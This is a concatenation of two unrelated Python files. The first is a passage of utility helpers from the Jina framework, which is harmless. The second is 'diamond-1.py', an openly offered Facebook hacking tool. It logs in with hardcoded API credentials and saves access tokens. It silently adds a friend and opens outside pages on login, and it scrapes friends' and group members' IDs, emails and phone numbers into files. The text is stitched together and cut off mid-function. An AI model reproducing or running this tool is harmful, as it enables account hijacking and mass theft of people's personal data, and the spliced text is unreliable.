except FileNotFoundError:
return False
def get_full_version() -> Optional[Tuple[Dict, Dict]]:
"""
Get the version of libraries used in Jina and environment variables.
:return: Version information and environment variables
"""
import os, grpc, zmq, numpy, google.protobuf, yaml, platform
from . import (
__version__,
__proto_version__,
__jina_env__,
__uptime__,
__unset_msg__,
)
from google.protobuf.internal import api_implementation
from grpc import _grpcio_metadata
from jina.logging.predefined import default_logger
from uuid import getnode
try:
info = {
'jina': __version__,
'jina-proto': __proto_version__,
'jina-vcs-tag': os.environ.get('JINA_VCS_VERSION', __unset_msg__),
'libzmq': zmq.zmq_version(),
'pyzmq': zmq.pyzmq_version(),
'numpy': numpy.__version__,
'protobuf': google.protobuf.__version__,
'proto-backend': api_implementation._default_implementation_type,
'grpcio': getattr(grpc, '__version__', _grpcio_metadata.__version__),
'pyyaml': yaml.__version__,
'python': platform.python_version(),
'platform': platform.system(),
'platform-release': platform.release(),
'platform-version': platform.version(),
'architecture': platform.machine(),
'processor': platform.processor(),
'uid': getnode(),
'session-id': str(random_uuid(use_uuid1=True)),
'uptime': __uptime__,
'ci-vendor': get_ci_vendor() or __unset_msg__,
}
env_info = {k: os.getenv(k, __unset_msg__) for k in __jina_env__}
full_version = info, env_info
except Exception as e:
default_logger.error(str(e))
full_version = None
return full_version
def format_full_version_info(info: Dict, env_info: Dict) -> str:
"""
Format the version information.
:param info: Version information of Jina libraries.
:param env_info: The Jina environment variables.
:return: Formatted version information.
"""
version_info = '\n'.join(f'- {k:30s}{v}' for k, v in info.items())
env_info = '\n'.join(f'* {k:30s}{v}' for k, v in env_info.items())
return version_info + '\n' + env_info
def _update_policy():
if __windows__:
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
elif 'JINA_DISABLE_UVLOOP' in os.environ:
return
else:
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ModuleNotFoundError:
warnings.warn(
'Install `uvloop` via `pip install "jina[uvloop]"` for better performance.'
)
def get_or_reuse_loop():
"""
Get a new event loop or reuse the currently opened event loop.
:return: An event loop; a new one is created if none is running or the current one is closed.
"""
try:
loop = asyncio.get_running_loop()
if loop.is_closed():
raise RuntimeError
except RuntimeError:
_update_policy()
# no running event loop
# create a new loop
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
return loop
def typename(obj):
"""
Get the typename of object.
:param obj: Target object.
:return: Typename of the obj.
"""
if not isinstance(obj, type):
obj = obj.__class__
try:
return f'{obj.__module__}.{obj.__name__}'
except AttributeError:
return str(obj)
class CatchAllCleanupContextManager:
"""
This context manager guarantees that the :method:``__exit__`` of the
sub context is called, even when there is an Exception in the
:method:``__enter__``.
:param sub_context: The context, that should be taken care of.
"""
def __init__(self, sub_context):
self.sub_context = sub_context
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type:
self.sub_context.__exit__(exc_type, exc_val, exc_tb)
class cached_property:
"""The decorator to cache property of a class."""
def __init__(self, func):
"""
Create the :class:`cached_property`.
:param func: Cached function.
"""
self.func = func
def __get__(self, obj, cls):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
return cached_value
value = obj.__dict__[f'CACHED_{self.func.__name__}'] = self.func(obj)
return value
def __delete__(self, obj):
cached_value = obj.__dict__.get(f'CACHED_{self.func.__name__}', None)
if cached_value is not None:
if hasattr(cached_value, 'close'):
cached_value.close()
del obj.__dict__[f'CACHED_{self.func.__name__}']
class _cache_invalidate:
"""Class for cache invalidation, remove strategy.
:param func: func to wrap as a decorator.
:param attribute: String as the function name to invalidate cached
data. E.g. in :class:`cached_property` we cache data inside the class obj
with the `key`: `CACHED_{func.__name__}`, the func name in `cached_property`
is the name to invalidate.
"""
def __init__(self, func, attribute: str):
self.func = func
self.attribute = attribute
def __call__(self, *args, **kwargs):
obj = args[0]
cached_key = f'CACHED_{self.attribute}'
if cached_key in obj.__dict__:
del obj.__dict__[cached_key] # invalidate
self.func(*args, **kwargs)
def __get__(self, obj, cls):
from functools import partial
return partial(self.__call__, obj)
def cache_invalidate(attribute: str):
"""The cache invalidator decorator to wrap the method call.
Check the implementation in :class:`_cache_invalidate`.
:param attribute: The func name as was stored in the obj to invalidate.
:return: wrapped method.
"""
def _wrap(func):
return _cache_invalidate(func, attribute)
return _wrap
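# Usage sketch (class and helper names are illustrative): `cached_property` stores
# the value under `CACHED_<name>` on the instance, and `cache_invalidate` drops that
# entry before running the decorated method.
#
#   class Indexer:
#       @cached_property
#       def handle(self):
#           return expensive_open()        # hypothetical helper, computed once
#
#       @cache_invalidate(attribute='handle')
#       def reload(self):
#           pass                           # next access to .handle recomputes it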
def get_now_timestamp():
"""
Get the current time as a Unix timestamp.
:return: The current timestamp as an int.
"""
now = datetime.now()
return int(datetime.timestamp(now))
def get_readable_time(*args, **kwargs):
"""
Get the datetime in human readable format (e.g. 115 days and 17 hours and 46 minutes and 40 seconds).
For example:
.. highlight:: python
.. code-block:: python
get_readable_time(seconds=1000)
:param args: arguments for datetime.timedelta
:param kwargs: key word arguments for datetime.timedelta
:return: Datetime in human readable format.
"""
import datetime
secs = float(datetime.timedelta(*args, **kwargs).total_seconds())
units = [('day', 86400), ('hour', 3600), ('minute', 60), ('second', 1)]
parts = []
for unit, mul in units:
if secs / mul >= 1 or mul == 1:
if mul > 1:
n = int(math.floor(secs / mul))
secs -= n * mul
else:
n = int(secs)
parts.append(f'{n} {unit}' + ('' if n == 1 else 's'))
return ' and '.join(parts)
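# Examples, following the unit breakdown above:
#   get_readable_time(seconds=1000)   -> '16 minutes and 40 seconds'
#   get_readable_time(days=1)         -> '1 day and 0 seconds'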
def get_internal_ip():
"""
Return the private IP address of the gateway for connecting from other machines on the same network.
:return: Private IP address.
"""
import socket
ip = '127.0.0.1'
try:
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
pass
return ip
def get_public_ip(timeout: float = 0.3):
"""
Return the public IP address of the gateway for connecting from other machines on the public network.
:param timeout: the seconds to wait until return None.
:return: Public IP address.
.. warning::
Setting :param:`timeout` to a large number will block the Flow.
"""
import urllib.request
results = []
def _get_ip(url):
try:
req = urllib.request.Request(url, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=timeout) as fp:
_ip = fp.read().decode()
results.append(_ip)
except Exception:
pass  # intentionally ignored; the public IP is simply not shown
ip_server_list = [
'https://api.ipify.org',
'https://ident.me',
'https://checkip.amazonaws.com/',
]
threads = []
for idx, ip in enumerate(ip_server_list):
t = threading.Thread(target=_get_ip, args=(ip,))
threads.append(t)
t.start()
for t in threads:
t.join(timeout)
for r in results:
if r:
return r
def convert_tuple_to_list(d: Dict):
"""
Convert all the tuple type values from a dict to list.
:param d: Dict type of data.
"""
for k, v in d.items():
if isinstance(v, tuple):
d[k] = list(v)
elif isinstance(v, dict):
convert_tuple_to_list(v)
def is_jupyter() -> bool: # pragma: no cover
"""
Check if we're running in a Jupyter notebook, using the magic command `get_ipython` that is only available in IPython/Jupyter.
:return: True if run in a Jupyter notebook else False.
"""
try:
get_ipython # noqa: F821
except NameError:
return False
shell = get_ipython().__class__.__name__ # noqa: F821
if shell == 'ZMQInteractiveShell':
return True # Jupyter notebook or qtconsole
elif shell == 'Shell':
return True # Google colab
elif shell == 'TerminalInteractiveShell':
return False # Terminal running IPython
else:
return False # Other type (?)
def run_async(func, *args, **kwargs):
"""Generalized asyncio.run for jupyter notebook.
When running inside Jupyter, an event loop already exists and cannot be stopped or killed.
Directly calling asyncio.run will fail with "This function cannot be called when another asyncio event loop
is running in the same thread".
.. see_also:
https://stackoverflow.com/questions/55409641/asyncio-run-cannot-be-called-from-a-running-event-loop
call `run_async(my_function, any_event_loop=True, *args, **kwargs)` to enable run with any eventloop
:param func: function to run
:param args: parameters
:param kwargs: key-value parameters
:return: asyncio.run(func)
"""
any_event_loop = kwargs.pop('any_event_loop', False)
class _RunThread(threading.Thread):
"""Create a running thread when in Jupyter notebook."""
def run(self):
"""Run given `func` asynchronously."""
self.result = asyncio.run(func(*args, **kwargs))
try:
loop = asyncio.get_running_loop()
except RuntimeError:
loop = None
if loop and loop.is_running():
# eventloop already exist
# running inside Jupyter
if any_event_loop or is_jupyter():
thread = _RunThread()
thread.start()
thread.join()
try:
return thread.result
except AttributeError:
from .excepts import BadClient
raise BadClient(
'something wrong when running the eventloop, result can not be retrieved'
)
else:
raise RuntimeError(
'you have an eventloop running but not using Jupyter/ipython, '
'this may mean you are using Jina with other integration? if so, then you '
'may want to use Client/Flow(asyncio=True). If not, then '
'please report this issue here: https://github.com/jina-ai/jina'
)
else:
return asyncio.run(func(*args, **kwargs))
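# Usage sketch (hypothetical coroutine): behaves like asyncio.run in a plain script,
# and transparently falls back to a helper thread inside Jupyter.
#
#   async def double(x):
#       return x * 2
#
#   result = run_async(double, 21)                        # -> 42
#   result = run_async(double, 21, any_event_loop=True)   # allow the thread fallback
#                                                         # even outside Jupyter when
#                                                         # a loop is already running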
def slugify(value):
"""
Normalize the string: strip surrounding whitespace, convert spaces to underscores, and remove characters that are not alphanumerics, underscores, hyphens or dots.
:param value: Original string.
:return: Processed string.
"""
s = str(value).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '', s)
def is_yaml_filepath(val) -> bool:
"""
Check if the file is YAML file.
:param val: Path of target file.
:return: True if the file is YAML else False.
"""
if __windows__:
r = r'.*.ya?ml$' # TODO: might not be exhaustive
else:
r = r'^[/\w\-\_\.]+.ya?ml$'
return re.match(r, val.strip()) is not None
def download_mermaid_url(mermaid_url, output) -> None:
"""
Download the jpg image from mermaid_url.
:param mermaid_url: The URL of the image.
:param output: A filename specifying the name of the image to be created, the suffix svg/jpg determines the file type of the output image.
"""
from urllib.request import Request, urlopen
try:
req = Request(mermaid_url, headers={'User-Agent': 'Mozilla/5.0'})
with open(output, 'wb') as fp:
fp.write(urlopen(req).read())
except:
from jina.logging.predefined import default_logger
default_logger.error(
'can not download image, please check your graph and the network connections'
)
def find_request_binding(target):
"""Find `@request` decorated methods in a class.
:param target: the target class to check
:return: a dictionary with key as request type and value as method name
"""
import ast, inspect
from . import __default_endpoint__
res = {}
def visit_function_def(node):
for e in node.decorator_list:
req_name = ''
if isinstance(e, ast.Call) and e.func.id == 'requests':
req_name = e.keywords[0].value.s
elif isinstance(e, ast.Name) and e.id == 'requests':
req_name = __default_endpoint__
if req_name:
if req_name in res:
raise ValueError(
f'you already bind `{res[req_name]}` with `{req_name}` request'
)
else:
res[req_name] = node.name
V = ast.NodeVisitor()
V.visit_FunctionDef = visit_function_def
V.visit(compile(inspect.getsource(target), '?', 'exec', ast.PyCF_ONLY_AST))
return res
def dunder_get(_dict: Any, key: str) -> Any:
"""Returns value for a specified dunderkey
A "dunderkey" is just a fieldname that may or may not contain
double underscores (dunderscores!) for referencing nested keys in
a dict. eg::
>>> data = {'a': {'b': 1}}
>>> dunder_get(data, 'a__b')
1
key 'b' can be referenced as 'a__b'
:param _dict : (dict, list, struct or object) which we want to index into
:param key : (str) that represents a first level or nested key in the dict
:return: (mixed) value corresponding to the key
"""
try:
part1, part2 = key.split('__', 1)
except ValueError:
part1, part2 = key, ''
try:
part1 = int(part1) # parse int parameter
except ValueError:
pass
from google.protobuf.struct_pb2 import ListValue
from google.protobuf.struct_pb2 import Struct
from google.protobuf.pyext._message import MessageMapContainer
if isinstance(part1, int):
result = _dict[part1]
elif isinstance(_dict, (Iterable, ListValue)):
result = _dict[part1]
elif isinstance(_dict, (dict, Struct, MessageMapContainer)):
if part1 in _dict:
result = _dict[part1]
else:
result = None
else:
result = getattr(_dict, part1)
return dunder_get(result, part2) if part2 else result
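# Examples of dunder-key lookups with the fallbacks above:
#   dunder_get({'a': {'b': 1}}, 'a__b')       -> 1
#   dunder_get({'a': [10, 20]}, 'a__1')       -> 20   (numeric part -> index)
#   dunder_get(SimpleNamespace(x=3), 'x')     -> 3    (attribute access)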
if False:
from fastapi import FastAPI
def extend_rest_interface(app: 'FastAPI') -> 'FastAPI':
"""Extend Jina built-in FastAPI instance with customized APIs, routing, etc.
:param app: the built-in FastAPI instance given by Jina
:return: the extended FastAPI instance
.. highlight:: python
.. code-block:: python
def extend_rest_interface(app: 'FastAPI'):
@app.get('/extension1')
async def root():
return {"message": "Hello World"}
return app
"""
return app
def get_ci_vendor() -> Optional[str]:
from jina import __resources_path__
with open(os.path.join(__resources_path__, 'ci-vendors.json')) as fp:
all_cis = json.load(fp)
for c in all_cis:
if isinstance(c['env'], str) and c['env'] in os.environ:
return c['constant']
elif isinstance(c['env'], dict):
for k, v in c['env'].items():
if os.environ.get(k, None) == v:
return c['constant']
elif isinstance(c['env'], list):
for k in c['env']:
if k in os.environ:
return c['constant']
|
diamond-1.py
|
#!/usr/bin/python
# coding=utf-8
# do not re-code this
# whoever re-codes it will be single for life
# (MR.K7C8NG) CREATOR
#SUBSCRIBE CHANNEL mrk7c8ng-ices
#FOLLOW INSTAGRAM @pranata_pasha
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Exit-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Colors-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animation-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.1)
##### LOGO #####
logo = """\033[1;96m█████████
\033[1;96m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;96m█\033[1;91m▼▼▼▼▼ \033[1;95m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;96m█ \033[1;92m \033[1;95m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;96m█\033[1;91m▲▲▲▲▲\033[1;95m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96mGOLD-SETAN
\033[1;96m█████████ \033[1;92m«----------✧----------»
\033[1;96m ██ ██
\033[1;96m╔══════════════════════════════════════════════╗
\033[1;96m║\033[1;96m* \033[1;95mAuthor \033[1;93m: \033[1;95mBrother•MR.K7C8NG \033[1;96m ║
\033[1;96m║\033[1;96m* \033[1;96mGitHub \033[1;93m: \033[1;96m\033[4mhttps://github.com/pashayogi\033[0m \033[1;96m ║
\033[1;96m║\033[1;96m*\033[1;93mYOUTUBE \033[1;93m: \033[1;91m\033mhttps://youtube.com/c/mrk7c8ng\033[0m \033[1;96m ║
\033[1;96m║\033[1;97m*\033[1;97mINSTAGRAM\033[1;92m: \033[1;96m\033m@pranata_pasha\033[0m \033[1;96m ║
\033[1;96m╚══════════════════════════════════════════════╝"""
# loading dots #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;91m║--\033[1;91m> \033[1;95m1.\033[1;96m Login"
print "\033[1;92m║--\033[1;91m> \033[1;95m2.\033[1;96m Login using token"
print "\033[1;93m║--\033[1;91m> \033[1;95m0.\033[1;96m Exit"
print "\033[1;95m║"
msuk = raw_input("\033[1;96m╚═\033[1;1mD \033[1;93m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;96m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;95m[+] \033[1;93mPassword \033[1;93m:\033[1;95m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://github.com/CrazyLolz100')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;94m║--\033[1;91m> \033[1;93m1.\033[1;95m User information"
print "\033[1;94m║--\033[1;91m> \033[1;93m2.\033[1;95m Get Id/email/hp"
print "\033[1;94m║--\033[1;91m> \033[1;93m3.\033[1;95m Hack facebook account "
print "\033[1;94m║--\033[1;91m> \033[1;93m4.\033[1;95m Bot "
print "\033[1;94m║--\033[1;91m> \033[1;93m5.\033[1;95m Others "
print "\033[1;94m║--\033[1;91m> \033[1;93m6.\033[1;95m Show token "
print "\033[1;94m║--\033[1;91m> \033[1;93m7.\033[1;95m Delete trash "
print "\033[1;94m║--\033[1;91m> \033[1;93m8.\033[1;95m LogOut "
print "\033[1;94m║--\033[1;91m> \033[1;93m0.\033[1;95m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://github.com/apaansihasw779')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### FRIEND IDs #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### IDs FROM A FRIEND #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
